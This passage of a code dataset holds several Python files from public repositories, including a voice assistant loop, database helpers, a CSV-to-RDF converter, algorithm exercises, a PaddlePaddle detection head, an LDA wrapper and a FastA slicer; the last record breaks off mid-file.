Artificial intellegence nee duniyaa ma tamaro swagat che! hu chhu professor\")\n\nwhile True: # professor keeps on listening until \"stop\" is said.\n results=speech.take() #speech file which has take fun() which converts audio to text\n if(\"wikipedia\") in results: \n wikidata.wikiInfo(results) #calls wikiInfo() fun from wikidata file\n elif(\"news\") in results:\n newsreader.readnews() #calls readnews() fun from newsreder file\n elif \"youtube\" in results:#opens youtube if there is youtube word included in a statement said by the user\n sites.website(results)\n elif \"google\" in results:\n sites.website(results)\n elif \"instagram\" in results:\n sites.website(results)\n elif \"netflix\" in results:\n sites.website(results)\n elif \"amazon\" in results:\n sites.website(results)\n elif \"gmail\" in results:\n sites.website(results) \n elif \"mail\" in results:\n sendmail.emailfun()#if a user want to send a mail than from sendmail.py file emailfun() is called. \n elif \"pc\" in results:#if a user want to open any file,program,application or a movie \n osmodule.command()#calls command() fun() from osmodule file\n elif(\"stop\") in results:# if user says stop than we will be out of the loop and program will end\n break\naudio.speak(\"I am tired now!, Bye Bye!!!!\")","repo_name":"Aayush1406/Desktop-Virtual-Assisstant","sub_path":"final.py","file_name":"final.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29959039295","text":"import os\nfrom typing import NamedTuple\nfrom datetime import datetime\nfrom peewee import SqliteDatabase\n\nfrom models.race_model import Driver, Company, Race, database_proxy\nfrom database import PATH_TO_DATABASE\nfrom database.exceptions.create import DatabaseAlreadyExist, DatabaseTableAlreadyExist\n\n\nclass RaceReport(NamedTuple):\n place: int\n driver: str\n company: str\n race_time: datetime\n\n\ndef create_db(db_name: str) -> bool:\n if os.path.isfile(os.path.join(PATH_TO_DATABASE, db_name)):\n raise DatabaseAlreadyExist(f'Database {db_name} exist')\n\n db = SqliteDatabase(os.path.join(PATH_TO_DATABASE, db_name))\n database_proxy.initialize(db)\n db.create_tables([Driver, Company, Race])\n return True\n\n\ndef write_drivers(drivers: list[dict[str, str]]) -> bool:\n if not Driver.select().count():\n for driver in drivers:\n driver = Driver(abbr=driver['abbr'], name=driver['name'])\n driver.save()\n return True\n raise DatabaseTableAlreadyExist('Table \"Driver\" is not empty. I don\\'t do anything')\n\n\ndef write_companies(companies: list[dict[str, str]]) -> bool:\n if not Company.select().count():\n for company in companies:\n company = Company(name=company['name'])\n company.save()\n return True\n raise DatabaseTableAlreadyExist('Table \"Company\" is not empty. I don\\'t do anything')\n\n\ndef write_race_table(race_table: list[RaceReport]) -> bool:\n if not Race.select().count():\n for race in race_table:\n driver_rows = Driver.select().where(Driver.name == race.driver)\n company_rows = Company.select().where(Company.name == race.company)\n if driver_rows and company_rows:\n place = race.place\n driver = list(driver_rows).pop()\n company = list(company_rows).pop()\n race_time = race.race_time\n race_complete = Race(\n place=place,\n driver=driver,\n company=company,\n time=race_time\n )\n race_complete.save()\n return True\n raise DatabaseTableAlreadyExist('Table \"Company\" is not empty. I don\\'t do anything')\n","repo_name":"wspr/herries-press","sub_path":"convert_log_files_into_db/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2237,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"37"} +{"seq_id":"8038202489","text":"import configparser\nimport csv\nimport pydash\nimport re\n\nclass Triplificator:\n\n def __init__(self, csvPath, rowNumTitle, rowNumFirst, rowNumLast, separator, dataPrefixIRI, predicatPrefixIRI, isTitle):\n\n #Initialisation of the config file reading\n config = configparser.ConfigParser()\n config.read(\"utils/config.ini\") #the configParser strip the spaces before and after the value\n\n #Setting up the object variables regarding the config file or the user input\n\n #CSV\n self.csvPath = csvPath\n\n #isTitle boolean\n self.isTitle = isTitle\n \n #Set up the object variables but not the coherence (like if title not first non empty row) and the indexes\n if (rowNumTitle is None):\n self.rowNumTitle = config[\"CSV\"][\"titleRow\"]\n else:\n self.rowNumTitle = int(rowNumTitle)\n\n if (rowNumFirst is None):\n self.rowNumFirst = config[\"CSV\"][\"firstDataRow\"]\n else:\n self.rowNumFirst = int(rowNumFirst)\n\n if (rowNumLast is None):\n self.rowNumLast = config[\"CSV\"][\"lastDataRow\"]\n else:\n self.rowNumLast = int(rowNumLast)\n\n if (separator is None):\n print(\"SEPARATOR NONE\")\n self.separator = config[\"CSV\"][\"separator\"]\n else:\n self.separator = separator\n\n #TURTLE\n if (dataPrefixIRI is None):\n self.dataPrefixIRI = config[\"TURTLE\"][\"dataPrefixIRI\"]\n else:\n self.dataPrefixIRI = dataPrefixIRI\n\n self.dataPrefix = re.findall(r'^[a-zA-Z]*:', self.dataPrefixIRI)[0]\n\n if (predicatPrefixIRI is None):\n self.predicatPrefixIRI = config[\"TURTLE\"][\"predicatPrefixIRI\"]\n else:\n self.predicatPrefixIRI = predicatPrefixIRI\n\n self.predicatPrefix = re.findall(r'^[a-zA-Z]*:', self.predicatPrefixIRI)[0]\n\n print(self.csvPath)\n print(self.rowNumTitle)\n print(self.rowNumFirst)\n print(self.rowNumLast)\n print(\"SEPARATOR\")\n print(self.separator)\n print(self.dataPrefixIRI)\n print(self.predicatPrefixIRI)\n print(self.dataPrefix)\n print(self.predicatPrefix)\n\n self.checkValues() # = Triplificator.checkValues(self)\n\n\n\n def checkValues(self): #voir si les valeurs rentrees par l'uti sont ok (par ex titre ligne 12 mais au final pas premiere ligne)\n #et rewrite les bonnes en fonction du csv si besoin (par ex par defaut 0 titre mais possible qu'a la ligne 4)\n with open(self.csvPath, 'r', encoding=\"utf-8\") as csvFile:\n\n #set up of title row number\n csvReader = csv.reader(csvFile, delimiter=self.separator) #object: csv.Reader -> not subscriptable\n csvReader = list(csvReader) #object: list -> subscriptable\n\n\n if (self.rowNumTitle == \"FirstRow\"):\n #check for first non empty list\n self.rowNumTitle = next(idx for idx, row in enumerate(csvReader) if row)\n else:\n #if row 1 contains titles -> index 0 contains titles (we want the index)\n self.rowNumTitle = self.rowNumTitle - 1\n \n if (self.rowNumFirst == \"AfterTitle\"):\n if (not(self.isTitle)):\n self.rowNumFirst = self.rowNumTitle\n else:\n #check for first non empty list after title\n self.rowNumFirst = next(idx for idx, row in enumerate(csvReader) if row and idx > self.rowNumTitle)\n else:\n self.rowNumFirst = self.rowNumFirst - 1\n\n if (self.rowNumLast == \"EndFile\"):\n #check for last non empty list after title\n self.rowNumLast = [idx for idx, row in enumerate(csvReader) if row][-1]\n else:\n self.rowNumLast = self.rowNumLast - 1\n\n\n print(\"Row num title after coherence treatment \"+str(self.rowNumTitle))\n print(\"Row first data after coherence treatment \"+str(self.rowNumFirst))\n print(\"Row last data after coherence treatment \"+str(self.rowNumLast))\n\n\n\n\n\n def writeFile(self, path):\n #here we assume that we have all the good configuration variables in our object, and rows numbers as indexes\n\n #write in output.ttl file\n with open(path, \"w\", encoding=\"utf-8\") as turtleFile:\n #first two rows are prefixes and the corresponding IRIs\n turtleFile.write(\"@prefix \"+self.dataPrefixIRI+\" .\\n\")\n turtleFile.write(\"@prefix \"+self.predicatPrefixIRI+\" .\\n\\n\")\n\n #open the csv to write info in ttl\n lineIndex = self.rowNumFirst\n with open(self.csvPath, 'r', encoding=\"utf-8\") as csvFile:\n csvReader = csv.reader(csvFile, delimiter=self.separator) #object: csv.Reader -> not subscriptable\n csvReader = list(csvReader) #object: list -> subscriptable\n print(csvReader)\n print(\"IS THERE A TITLE\", self.isTitle)\n print(\"IS THERE A TITLE\", type(self.isTitle))\n #select the list of titles (titles = potential csv column names)\n if (self.isTitle):\n print(\"YES TITLE\")\n self.listTitles = [row for idx, row in enumerate(csvReader) if idx == self.rowNumTitle][0]\n self.listTitles = list(map(pydash.camel_case, self.listTitles))\n\n self.listData = [row for idx, row in enumerate(csvReader) if idx in range(self.rowNumFirst, self.rowNumLast+1)]\n for row in self.listData:\n turtleFile.write(self.dataPrefix + str(lineIndex+1) + \"\\t\\t\")\n dictRow = dict(zip(self.listTitles, row))\n for key, value in dictRow.items():\n turtleFile.write(self.predicatPrefix+str(key) + \"\\t\\t\" + \"\\\"\"+value+\"\\\"\" + \" ;\\n\\t\\t\")\n turtleFile.write(\".\\n\")\n lineIndex += 1\n\n else: #if no titles\n print(\"NO TITLE\")\n self.nbCol = len(csvReader[self.rowNumTitle])\n self.listTitles = [\"attribute\"+str(i+1) for i in range(self.nbCol)]\n print(self.rowNumTitle)\n print(self.rowNumFirst)\n\n self.listData = [row for idx, row in enumerate(csvReader) if idx in range(self.rowNumFirst, self.rowNumLast+1)]\n for row in self.listData:\n turtleFile.write(self.dataPrefix + str(lineIndex+1) + \"\\t\\t\")\n dictRow = dict(zip(self.listTitles, row))\n for key, value in dictRow.items():\n turtleFile.write(self.predicatPrefix+str(key) + \"\\t\\t\" + \"\\\"\"+value+\"\\\"\" + \" ;\\n\\t\\t\")\n turtleFile.write(\".\\n\")\n lineIndex += 1\n\n \n \n\n\n\nif __name__ == \"__main__\": \n chemin = \"data/test3.csv\"\n #None if the user does not enter anything for the below variables\n #If user enters all rows are str\n ligneTitre = None\n lignePremier = 4\n ligneDernier = 18\n sep = \"|\"\n dataPrefIRI = None\n predicatPrefIRI = \"pp: \"\n #We assume that we have logical variables here, like rowNumTitle < rowFirstData < rowLastData etc.\n #globally things that can be handled using a web script such as JS, Django does that also\n a = Triplificator(chemin, ligneTitre, lignePremier, ligneDernier, sep, dataPrefIRI, predicatPrefIRI, True)\n a.writeFile()\n ","repo_name":"Lxkx/triplifier","sub_path":"triplifier/utils/triplificator.py","file_name":"triplificator.py","file_ext":"py","file_size_in_byte":7643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8284781243","text":"# https://leetcode.com/problems/container-with-most-water/submissions/\n\n\ndef maxArea( height) :\n \n maxarea = float(\"-inf\")\n start = 0\n end = len(height)-1\n \n while start <= end:\n left = height[start]\n right = height[end]\n maxarea = max(maxarea, (end-start)*(min(left, right )))\n \n if left < right:\n start +=1\n else:\n end -=1\n \n return maxarea\n \n \n \n \n # bruteforce\n \n# maxarea = float(\"-inf\")\n \n# for i in range(len(height)):\n# for j in range(i+1, len(height)):\n# left = height[i]\n# right = height[j]\n \n# maxarea = max(maxarea, min(left,right) * (j-i))\n \n# return maxarea","repo_name":"bolu-tife/Data-Structures-and-Algorithms","sub_path":"Leetcode Questions/container_with_most_water.py","file_name":"container_with_most_water.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7013148243","text":"import math\nimport paddle\nimport paddle.nn as nn\nimport paddle.nn.functional as F\nfrom paddle.nn.initializer import KaimingUniform\nfrom paddle.nn.initializer import Constant, Normal\nfrom ppdet.core.workspace import register\nfrom ppdet.modeling.losses import CTFocalLoss\nfrom paddle.vision.ops import DeformConv2D\nfrom paddle.regularizer import L2Decay\nfrom paddle import ParamAttr\n\nclass DeformableConvV2(nn.Layer):\n def __init__(self,\n in_channels,\n out_channels,\n kernel_size,\n stride=1,\n padding=0,\n dilation=1,\n groups=1,\n weight_attr=None,\n bias_attr=None,\n lr_scale=1,\n regularizer=None,\n skip_quant=False,\n dcn_bias_regularizer=L2Decay(0.),\n dcn_bias_lr_scale=2.):\n super(DeformableConvV2, self).__init__()\n self.offset_channel = 2 * kernel_size**2\n self.mask_channel = kernel_size**2\n\n if lr_scale == 1 and regularizer is None:\n offset_bias_attr = ParamAttr(initializer=Constant(0.))\n else:\n offset_bias_attr = ParamAttr(\n initializer=Constant(0.),\n learning_rate=lr_scale,\n regularizer=regularizer)\n self.conv_offset = nn.Conv2D(\n in_channels,\n 3 * kernel_size**2,\n kernel_size,\n stride=stride,\n padding=(kernel_size - 1) // 2,\n weight_attr=ParamAttr(initializer=Constant(0.0)),\n bias_attr=offset_bias_attr)\n if skip_quant:\n self.conv_offset.skip_quant = True\n\n if bias_attr:\n # in FCOS-DCN head, specifically need learning_rate and regularizer\n dcn_bias_attr = ParamAttr(\n initializer=Constant(value=0),\n regularizer=dcn_bias_regularizer,\n learning_rate=dcn_bias_lr_scale)\n else:\n # in ResNet backbone, do not need bias\n dcn_bias_attr = False\n self.conv_dcn = DeformConv2D(\n in_channels,\n out_channels,\n kernel_size,\n stride=stride,\n padding=(kernel_size - 1) // 2 * dilation,\n dilation=dilation,\n groups=groups,\n weight_attr=weight_attr,\n bias_attr=dcn_bias_attr)\n\n def forward(self, x):\n offset_mask = self.conv_offset(x)\n offset, mask = paddle.split(\n offset_mask,\n num_or_sections=[self.offset_channel, self.mask_channel],\n axis=1)\n mask = F.sigmoid(mask)\n y = self.conv_dcn(x, offset, mask=mask)\n return y\n\nclass ConvLayer(nn.Layer):\n def __init__(self,\n ch_in,\n ch_out,\n kernel_size,\n stride=1,\n padding=0,\n dilation=1,\n groups=1,\n bias=False):\n super(ConvLayer, self).__init__()\n bias_attr = False\n fan_in = ch_in * kernel_size**2\n bound = 1 / math.sqrt(fan_in)\n param_attr = paddle.ParamAttr(initializer=KaimingUniform())\n if bias:\n bias_attr = paddle.ParamAttr(\n initializer=nn.initializer.Uniform(-bound, bound))\n self.conv = nn.Conv2D(\n in_channels=ch_in,\n out_channels=ch_out,\n kernel_size=kernel_size,\n stride=stride,\n padding=padding,\n dilation=dilation,\n groups=groups,\n weight_attr=param_attr,\n bias_attr=bias_attr)\n\n def forward(self, inputs):\n out = self.conv(inputs)\n\n return out\n\n\n@register\nclass CenterNetHead(nn.Layer):\n \"\"\"\n Args:\n in_channels (int): the channel number of input to CenterNetHead.\n num_classes (int): the number of classes, 80 by default.\n head_planes (int): the channel number in all head, 256 by default.\n heatmap_weight (float): the weight of heatmap loss, 1 by default.\n regress_ltrb (bool): whether to regress left/top/right/bottom or\n width/height for a box, true by default\n size_weight (float): the weight of box size loss, 0.1 by default.\n offset_weight (float): the weight of center offset loss, 1 by default.\n\n \"\"\"\n\n __shared__ = ['num_classes']\n\n def __init__(self,\n in_channels,\n num_classes=80,\n head_planes=256,\n heatmap_weight=1,\n regress_ltrb=True,\n size_weight=0.1,\n offset_weight=1,\n dcn_head=True):\n super(CenterNetHead, self).__init__()\n self.weights = {\n 'heatmap': heatmap_weight,\n 'size': size_weight,\n 'offset': offset_weight\n }\n\n if not dcn_head:\n self.heatmap = nn.Sequential(\n ConvLayer(\n in_channels, head_planes, kernel_size=3, padding=1, bias=True),\n nn.ReLU(),\n ConvLayer(\n head_planes,\n num_classes,\n kernel_size=1,\n stride=1,\n padding=0,\n bias=True))\n self.heatmap[2].conv.bias[:] = -2.19\n self.size = nn.Sequential(\n ConvLayer(\n in_channels, head_planes, kernel_size=3, padding=1, bias=True),\n nn.ReLU(),\n ConvLayer(\n head_planes,\n 4 if regress_ltrb else 2,\n kernel_size=1,\n stride=1,\n padding=0,\n bias=True))\n self.offset = nn.Sequential(\n ConvLayer(\n in_channels, head_planes, kernel_size=3, padding=1, bias=True),\n nn.ReLU(),\n ConvLayer(\n head_planes, 2, kernel_size=1, stride=1, padding=0, bias=True))\n else:\n print(\"********** Head use dcn ***************\")\n\n self.heatmap = nn.Sequential(\n DeformableConvV2(\n in_channels, head_planes, kernel_size=3, padding=1, bias_attr=True),\n nn.ReLU(),\n DeformableConvV2(\n head_planes,\n num_classes,\n kernel_size=1,\n stride=1,\n padding=0,\n bias_attr=True))\n self.heatmap[2].conv_dcn.bias[:] = -2.19\n self.size = nn.Sequential(\n DeformableConvV2(\n in_channels, head_planes, kernel_size=3, padding=1, bias_attr=True),\n nn.ReLU(),\n DeformableConvV2(\n head_planes,\n 4 if regress_ltrb else 2,\n kernel_size=1,\n stride=1,\n padding=0,\n bias_attr=True))\n self.offset = nn.Sequential(\n DeformableConvV2(\n in_channels, head_planes, kernel_size=3, padding=1, bias_attr=True),\n nn.ReLU(),\n DeformableConvV2(\n head_planes, 2, kernel_size=1, stride=1, padding=0, bias_attr=True))\n\n self.focal_loss = CTFocalLoss()\n\n @classmethod\n def from_config(cls, cfg, input_shape):\n if isinstance(input_shape, (list, tuple)):\n input_shape = input_shape[0]\n return {'in_channels': input_shape.channels}\n\n def forward(self, feat, inputs):\n heatmap = self.heatmap(feat)\n size = self.size(feat)\n offset = self.offset(feat)\n if self.training:\n loss = self.get_loss(heatmap, size, offset, self.weights, inputs)\n return loss\n else:\n heatmap = F.sigmoid(heatmap)\n return {'heatmap': heatmap, 'size': size, 'offset': offset}\n\n def get_loss(self, heatmap, size, offset, weights, inputs):\n heatmap_target = inputs['heatmap']\n size_target = inputs['size']\n offset_target = inputs['offset']\n index = inputs['index']\n mask = inputs['index_mask']\n heatmap = paddle.clip(F.sigmoid(heatmap), 1e-4, 1 - 1e-4)\n heatmap_loss = self.focal_loss(heatmap, heatmap_target)\n\n size = paddle.transpose(size, perm=[0, 2, 3, 1])\n size_n, size_h, size_w, size_c = size.shape\n size = paddle.reshape(size, shape=[size_n, -1, size_c])\n index = paddle.unsqueeze(index, 2)\n batch_inds = list()\n for i in range(size_n):\n batch_ind = paddle.full(\n shape=[1, index.shape[1], 1], fill_value=i, dtype='int64')\n batch_inds.append(batch_ind)\n batch_inds = paddle.concat(batch_inds, axis=0)\n index = paddle.concat(x=[batch_inds, index], axis=2)\n pos_size = paddle.gather_nd(size, index=index)\n mask = paddle.unsqueeze(mask, axis=2)\n size_mask = paddle.expand_as(mask, pos_size)\n size_mask = paddle.cast(size_mask, dtype=pos_size.dtype)\n pos_num = size_mask.sum()\n size_mask.stop_gradient = True\n size_target.stop_gradient = True\n size_loss = F.l1_loss(\n pos_size * size_mask, size_target * size_mask, reduction='sum')\n size_loss = size_loss / (pos_num + 1e-4)\n\n offset = paddle.transpose(offset, perm=[0, 2, 3, 1])\n offset_n, offset_h, offset_w, offset_c = offset.shape\n offset = paddle.reshape(offset, shape=[offset_n, -1, offset_c])\n pos_offset = paddle.gather_nd(offset, index=index)\n offset_mask = paddle.expand_as(mask, pos_offset)\n offset_mask = paddle.cast(offset_mask, dtype=pos_offset.dtype)\n pos_num = offset_mask.sum()\n offset_mask.stop_gradient = True\n offset_target.stop_gradient = True\n offset_loss = F.l1_loss(\n pos_offset * offset_mask,\n offset_target * offset_mask,\n reduction='sum')\n offset_loss = offset_loss / (pos_num + 1e-4)\n\n det_loss = weights['heatmap'] * heatmap_loss + weights[\n 'size'] * size_loss + weights['offset'] * offset_loss\n\n return {\n 'det_loss': det_loss,\n 'heatmap_loss': heatmap_loss,\n 'size_loss': size_loss,\n 'offset_loss': offset_loss\n }\n","repo_name":"PaddlePaddle/awesome-DeepLearning","sub_path":"Paddle_Industry_Practice_Sample_Library/Vehicle_Detection_and_Tracking/code/centernet_head_dcn.py","file_name":"centernet_head_dcn.py","file_ext":"py","file_size_in_byte":10443,"program_lang":"python","lang":"en","doc_type":"code","stars":2544,"dataset":"github-code","pt":"37"} +{"seq_id":"44463589327","text":"# x 방향 pid\nimport numpy as np\np, d = 0.5, 0.5\n\nerrorLR = w // 2 - cx\nposX = p * errorLR + d * (errorLR - perrorLR)\nposX = np.interp(posX, [-w//2, w//2], [20, 160]) # range mapping 함수 posX 값을 [20, 160] 범위로 매핑\nperrorLR = errorLR\n\n# object tracking pd control","repo_name":"joohyuk95/python_source_1","sub_path":"openCV/pid_code.py","file_name":"pid_code.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3562731126","text":"def get_first_k(data,length,k,start,end):\n if start>end:\n return -1\n mid_index = (start + end) // 2 # 这里是 start+end\n mid_data = data[mid_index]\n if mid_data == k:\n if (mid_index>0 and data[mid_index-1]!=k) or mid_index == 0:\n return mid_index\n else:\n end = mid_index - 1\n elif mid_data < k:\n start = mid_index + 1\n else:\n end = mid_index - 1\n return get_first_k(data, length, k, start, end)\n\n\ndef get_last_k(data, length, k, start, end):\n if start > end:\n return -1\n mid_index = (start + end) // 2\n mid_data = data[mid_index]\n if mid_data == k:\n if mid_index == 0 or (mid_index < length-1 and data[mid_index+1]!=k):\n return mid_index\n elif mid_data < k: # k在右半部分\n start = mid_index + 1\n else: # k在左半部分\n end = mid_index - 1\n return get_last_k(data, length, k, start, end)\n\ndef get_number_of_k(data, length, k):\n number = 0\n if data and length>0:\n first_k = get_first_k(data, length, k, 0, length-1)\n last_k = get_last_k(data, length, k, 0, length-1)\n if first_k > -1 and last_k > -1:\n number = last_k - first_k +1\n return number\n\n\n# 非递归\ndef get_k_counts(nums, k):\n first = get_first_k(nums, k)\n last = get_last_k(nums, k)\n if first < 0 and last < 0:\n return 0\n if first < 0 or last < 0:\n return 1\n return last - first + 1\n\n\ndef get_first_k(nums, k):\n left, right = 0, len(nums) - 1\n while left <= right:\n mid = (left + right) // 2\n if nums[mid] < k:\n if mid + 1 < len(nums) and nums[mid + 1] == k:\n return mid + 1\n left = mid + 1\n elif nums[mid] == k:\n if mid - 1 < 0 or (mid - 1 >= 0 and nums[mid - 1] < k):\n return mid\n right = mid - 1\n else:\n right = mid - 1\n return -1\n\n\ndef get_last_k(nums, k):\n left, right = 0, len(nums) - 1\n while left <= right:\n mid = (left + right) // 2\n if nums[mid] < k:\n left = mid + 1\n elif nums[mid] == k:\n if mid + 1 == len(nums) or (mid + 1 < len(nums) and nums[mid + 1] > k):\n return mid\n left = mid + 1\n else:\n if mid - 1 >= 0 and nums[mid - 1] == k:\n return mid - 1\n right = mid - 1\n return -1\n\n# 直接调用count计算\nclass Solution:\n def GetNumberOfK1(self, data, k):\n if len(data) == 0:\n return 0\n else:\n return data.count(k)\n","repo_name":"xiaokongkong/some-tricks-about-python","sub_path":"刷题/剑指offer/数组/数字在排序数组中出现的次数.py","file_name":"数字在排序数组中出现的次数.py","file_ext":"py","file_size_in_byte":2584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31685933151","text":"import lda\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom utlis import data\n\n\nclass LDAModel(object):\n def __init__(self, n_topics=20, n_iter=1000, random_state=None):\n self.X = None\n self.word_vector = None\n self.model = lda.LDA(n_topics=n_topics, n_iter=n_iter, random_state=random_state)\n\n self.n_file = None\n self.n_word = None\n\n def load_X(self, fpath):\n self.X = np.load(fpath)\n self.n_file = self.X.shape[0]\n self.n_word = self.X.shape[1]\n return self.X\n\n def load_word_vector(self, fpath):\n with open(fpath, \"r\", encoding='utf-8') as f:\n self.word_vector = f.read().split()\n return self.word_vector\n\n def fit(self):\n self.model.fit(self.X)\n\n def save_topic_words(self, n_words=20):\n topic_word = self.model.topic_word_\n with open(\"dataset/output/topic_words.txt\", \"w\") as f:\n for i, topic_dist in enumerate(topic_word):\n topic_words = []\n for index in np.argsort(topic_dist)[:-(n_words + 1):-1]:\n topic_words.append(self.word_vector[index])\n f.write(\"Topic\"+str(i)+\":\\t\"+\"\\t\".join(topic_words)+\"\\n\")\n\n def save_doc_topic(self, fpath=1):\n doc_topic = self.model.doc_topic_\n first_topics = []\n second_topics = []\n for i in range(self.n_file):\n first_topic = np.argsort(doc_topic[i])[-1]\n second_topic = np.argsort(doc_topic[i])[-2]\n first_topics.append(first_topic)\n second_topics.append(second_topic)\n f = data.ExcelProcessor(1)\n f.write_topic(first_topics, second_topics)\n\n def info_X(self):\n n_word = np.sum(self.X, axis=0)\n N = len(n_word)\n print(N)\n index_1 = np.where(n_word == 1)[0]\n index_10 = np.where(n_word < 11)[0]\n index_20 = np.where(n_word < 21)[0]\n\n print(f\"1:\\t{len(index_1)}\\t{len(index_1)/N}\")\n print(f\"10:\\t{len(index_10)}\\t{len(index_10)/N}\\t\")\n print(f\"20:\\t{len(index_20)}\\t{len(index_20)/N}\\t\")\n\n\n\n\n","repo_name":"Haoran-Jia/COVID-19-literature-analyse","sub_path":"LDA.py","file_name":"LDA.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"14148373237","text":"import sys\r\nimport gcdE\r\n\r\n\r\n#compute inverse of b % a(Find inverse of b when modding by a)\r\ndef computeInverse(a,b,log=False):\r\n if b == 0:\r\n return 0\r\n if b > a:\r\n if log:\r\n print(\"Error! a should be more than b!\")\r\n print(\"Getting congruence class of b\")\r\n print(f\"b = {b} % {a}\")\r\n b = b % a\r\n if log:\r\n print(f\"b is now {b}\")\r\n\r\n gcdVal, u, v = gcdE.gcdE(a,b,log)\r\n if log:\r\n print(f\"GCD = {gcdVal}, u = {u}, v = {v}\")\r\n\r\n if gcdVal == 1:\r\n inverse = v % a\r\n if log:\r\n print(f\"Inverse = {v} % {a} = {inverse}\")\r\n print(f\"Inverse of {b} % {a} = {inverse}\")\r\n return inverse\r\n else:\r\n if log:\r\n print(f\"{b} % {a} has no inverse\")\r\n return b\r\n\r\n\r\nif __name__ == \"__main__\":\r\n if len(sys.argv) != 3:\r\n print(\"Usage: \" + sys.argv[0] + \" b a\")\r\n quit()\r\n b = int(sys.argv[1])\r\n a = int(sys.argv[2])\r\n print(computeInverse(a,b,True))\r\n ","repo_name":"drg101/M360-algos","sub_path":"computeInverse.py","file_name":"computeInverse.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"5928185225","text":"#!/usr/bin/env python\n\n\nimport os\nimport sys\nfrom argparse import ArgumentParser\nfrom Bio import SeqIO\n\ndef parseArgs():\n\tparser = ArgumentParser(description='Slices out a single sequence from a '\n\t'FastA file', add_help=False)\n\treq = parser.add_argument_group('Required')\n\treq.add_argument('-i', '--infile', required=True, metavar='FILE',\n\t\ttype=str, help='input FastA sequence file')\n\treq.add_argument('-d', '--defline', required=True, metavar='STR',\n\t\ttype=str, help='header/defline name for target sequence record to '\n\t\t'slice out sequences from')\n\treq.add_argument('-b', '--begin', required=True, metavar='INT', type=int,\n\t\thelp='initial position to extract from the specified sequence record')\n\treq.add_argument('-e', '--end', required=True, metavar='INT', type=int,\n\t\thelp='final position to extract from the specified sequence record')\n\topt = parser.add_argument_group('Optional')\n\topt.add_argument('-h', '--help', action='help',\n\t\thelp='show this help message and exit')\n\topt.add_argument('-m', '--defline-query-method', required=False,\n\t\ttype=str, default='substr', choices=['full', 'substr'],\n\t\thelp='search method for header/defline name [substr]')\n\topt.add_argument('-o', '--outfile', required=False, metavar='FILE',\n\t\tdefault=None, help='FastA-formatted sliced output [stdout]')\n\treturn parser.parse_args()\n\ndef main():\n\topt = parseArgs()\n\tifh = os.path.abspath(opt.infile)\n\tget = (opt.defline, opt.begin-1, opt.end)\n\n\t# Find seq record\n\tmfa = SeqIO.parse(ifh, 'fasta')\n\tfnd = []\n\tif opt.defline_query_method == 'full':\n\t\tfor rec in mfa:\n\t\t\tif str(get[0]) == rec.description:\n\t\t\t\tfnd.append(rec)\n\telif opt.defline_query_method == 'substr':\t\t\n\t\tfor rec in mfa:\n\t\t\tif str(get[0]) in rec.description:\n\t\t\t\tfnd.append(rec)\n\telse:\n\t\tsys.stderr.write('ERROR: unsupported {} search method; argparse '\n\t\t\t'should have prevented this\\n'.format(opt.defline_query_method))\n\t\tsys.exit(1)\n\n\t# Halt if anything but one seq record match found\n\tif len(fnd) > 1:\n\t\tsys.stderr.write('ERROR: >1 defline match to {}\\n'.format(get[0]))\n\t\tsys.exit(1)\n\telif len(fnd) == 0:\n\t\tsys.stderr.write('ERROR: {} absent from deflines\\n'.format(get[0]))\n\t\tsys.exit(1)\n\n\t# Slice seq record\n\tout = fnd[0][get[1]:get[2]]\n\n\t# Output\n\tif opt.outfile is not None:\n\t\tofh = os.path.abspath(os.path.expanduser(opt.outfile))\n\t\tSeqIO.write(out, ofh, 'fasta')\n\telse:\n\t\tSeqIO.write(out, sys.stdout, 'fasta')\n\nif __name__ == '__main__':\n\tmain()","repo_name":"chrisgulvik/genomics_scripts","sub_path":"slice.fasta.py","file_name":"slice.fasta.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"72697536107","text":"import base64\nimport os\nimport pandas as pd\nimport pickle\nimport random\nimport hashlib\nimport dill\n\nclass DataModelManager:\n def __init__(self, lookup_table_file=\"data_model_table.csv\", lookup_table_folder=\"data_models\", random_seed=1000):\n self.lookup_table_folder = lookup_table_folder\n self.lookup_table_file = os.path.join(self.lookup_table_folder, lookup_table_file)\n self.random_seed = random_seed\n\n def encode(self, datatype=\"model\", return_pickle=True, return_compact=False):\n \"\"\"\n\n Parameters\n ----------\n return_compact : boolean\n Returns a compact version of the encoded data which is formed from the first+last ten characters\n of the encoded.\n\n \"\"\"\n\n data_params = datatype\n encoded_message = hashlib.sha1(str.encode(data_params))\n encode_data_name = encoded_message.hexdigest()\n encode_data_name = encode_data_name.replace('b', '')\n encode_data_name = encode_data_name.replace(\"'\", '')\n\n # perform shuffling\n random.seed(self.random_seed)\n encode_data_name = list(encode_data_name)\n random.shuffle(encode_data_name)\n encode_data_name = ''.join(encode_data_name)\n if return_compact and len(encode_data_name)>=20:\n return encode_data_name[:10]+encode_data_name[-10:] + (\".p\" if return_pickle else \"\")\n else:\n return encode_data_name + (\".p\" if return_pickle else \"\")\n\n def update_csv(self, datatype=\"model\"):\n encode_data_name = self.encode(datatype, return_pickle=True, return_compact=False)\n decode_data = datatype\n if not os.path.exists(self.lookup_table_folder):\n os.mkdir(self.lookup_table_folder)\n\n if not os.path.exists(self.lookup_table_file):\n next_file_name = str(1).zfill(5) + '.p'\n new_df = pd.DataFrame(\n {\"filename\": [next_file_name], \"encoded\": [encode_data_name], \"decoded\": [decode_data]})\n new_df.to_csv(self.lookup_table_file, index=False)\n else:\n csv_df = pd.read_csv(self.lookup_table_file)\n current_file_number = 